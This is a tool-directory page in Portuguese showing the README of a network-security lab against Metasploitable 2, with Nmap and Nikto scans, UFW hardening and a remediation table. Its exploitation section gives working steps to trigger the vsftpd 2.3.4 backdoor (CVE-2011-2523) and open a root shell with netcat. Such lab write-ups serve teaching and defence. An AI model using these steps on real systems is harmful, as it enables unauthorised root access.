Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/amirmuhammadmarvi/network-security-lab
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoAuditoria de ConfiguraçãoSegurança WebSegurança de RedeTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Labs e Prática
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Laboratório virtual controlado de ataque e defesa — exploração do CVE-2011-2523, reconhecimento com Nmap, varredura com Nikto, endurecimento com UFW no Metasploitable 2

Ver Repositório
3há 3 mesesAinda não revisado
Compartilhar

🔬 Laboratório de Segurança de Rede

Um ambiente virtual controlado simulando cenários reais de ataque e defesa

Python Platform CVE Status


📋 Visão Geral

Este laboratório simula um teste de penetração e um exercício de hardening defensivo do mundo real em um ambiente virtual totalmente isolado. Demonstra todo o ciclo de vida da segurança ofensiva — desde o reconhecimento até a exploração — e os controles defensivos que mitigariam cada risco.

Resultado chave: Acesso root completo na máquina alvo em menos de 60 segundos explorando um backdoor conhecido, sem credenciais e sem ferramentas especiais.


🏗 Ambiente do Laboratório

ComponenteDetalhes
HipervisorVMware Workstation
RedeHost-Only / NAT (totalmente isolado)
SO AtacanteUbuntu 24 LTS
SO AlvoMetasploitable 2 (Linux 2.6.x)
IP do Atacante192.168.148.255
IP do Alvo192.168.148.130

🎯 Metodologia

root@kitploit:~
Reconhecimento  →  Varredura  →  Exploração  →  Defesa & Hardening

🔍 Fase 1 — Reconhecimento

Varredura de Portas com Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Principais descobertas — 23 portas abertas no total:

PortaServiçoVersãoRisco
21FTPvsftpd 2.3.4🔴 CRÍTICO — Backdoor conhecido (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 MÉDIO — Desatualizado
23TelnetLinux telnetd🟠 ALTO — Protocolo em texto claro
80HTTPApache 2.2.8🟠 ALTO — Múltiplos CVEs
1524BindshellShell root🔴 CRÍTICO — Shell root aberto
3306MySQL5.0.51a🟠 ALTO — Banco de dados exposto
5900VNCProtocolo 3.3🟠 ALTO — Autenticação fraca
6667IRCUnrealIRCd🔴 CRÍTICO — Backdoor conhecido

Varredura Web com Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 vulnerabilidades encontradas, incluindo:

  • phpMyAdmin exposto publicamente
  • phpinfo.php vazando configuração completa do servidor
  • HTTP TRACE habilitado (ataques XST)
  • Indexação de diretório habilitada em /doc/, /test/
  • Apache 2.2.8 e PHP 5.2.4 desatualizados

💥 Fase 2 — Exploração

CVE-2011-2523 — Backdoor vsftpd 2.3.4

vsftpd 2.3.4 contém um backdoor introduzido por meio de um comprometimento da cadeia de suprimentos. Enviar um nome de usuário terminado em :) faz com que o servidor abra um shell root na porta 6200.

root@kitploit:~
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200

# Step 3 — Verify access
whoami
# → root

Resultado: Acesso completo ao nível root alcançado em < 60 segundos — sem credenciais, sem necessidade de framework de exploração.

Impacto: Um atacante com acesso root pode ler/modificar/excluir qualquer arquivo, instalar malware, exfiltrar dados ou fazer pivot para outros hosts na rede.


🛡 Fase 3 — Defesa & Hardening

Firewall UFW — Política de Negação Padrão

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

Remediações Recomendadas

VulnerabilidadeCorreção
Backdoor vsftpd 2.3.4Atualizar para vsftpd 3.x ou migrar para SFTP
Shell root aberto (porta 1524)Desabilitar imediatamente, auditar instalação
Telnet (porta 23)Desabilitar — impor apenas SSH
phpMyAdmin expostoRestringir por IP, exigir autenticação forte
MySQL exposto (porta 3306)Vincular ao localhost, bloquear acesso externo
VNC exposto (porta 5900)Restringir por IP ou desabilitar
Indexação de diretórioApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Apache + PHP desatualizadosAtualizar para versões LTS suportadas

📄 Relatório Completo

Veja report.md para a avaliação completa — metodologia completa, saídas de comandos, tabela de descobertas, etapas de exploração e todas as recomendações de remediação.


⚠️ Aviso Legal

Este laboratório foi conduzido em um ambiente virtual totalmente isolado usando software intencionalmente vulnerável (Metasploitable 2). Todas as técnicas são apenas para fins educacionais e de portfólio. Não replique em sistemas que você não possui ou para os quais não tenha permissão escrita explícita para testar.


🛠 Ferramentas Utilizadas

FerramentaFinalidade
NmapVarredura de portas e detecção de serviços
NiktoVarredura de vulnerabilidades web
NetcatConexão ao shell do backdoor
UFWConfiguração de firewall baseado em host
Cliente FTPAcionamento do backdoor vsftpd
VMware WorkstationVirtualização do laboratório

Autor: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Baixar ferramenta